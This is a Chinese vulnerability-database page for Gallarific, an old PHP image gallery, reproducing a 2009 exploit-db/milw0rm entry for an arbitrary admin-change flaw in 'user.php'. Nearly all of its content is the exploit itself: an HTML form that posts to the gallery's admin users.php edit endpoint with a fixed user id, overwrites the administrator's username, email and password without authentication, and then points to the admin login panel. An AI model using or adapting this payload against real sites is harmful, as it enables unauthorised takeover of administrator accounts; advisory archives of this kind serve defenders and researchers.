Gallarific - 'user.php' Arbirary Change Admin Information

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057839 漏洞类型
发布时间 2009-05-26 更新时间 2009-05-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8796
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<titre> gallarific exploit </titre>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5"> Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc">h<font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password »"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center"> </p>
  <p align="center"> </p>
  </form>
  </div>
 <div id="help">
   </div>
 <br>
</body>
</html>

# milw0rm.com [2009-05-26]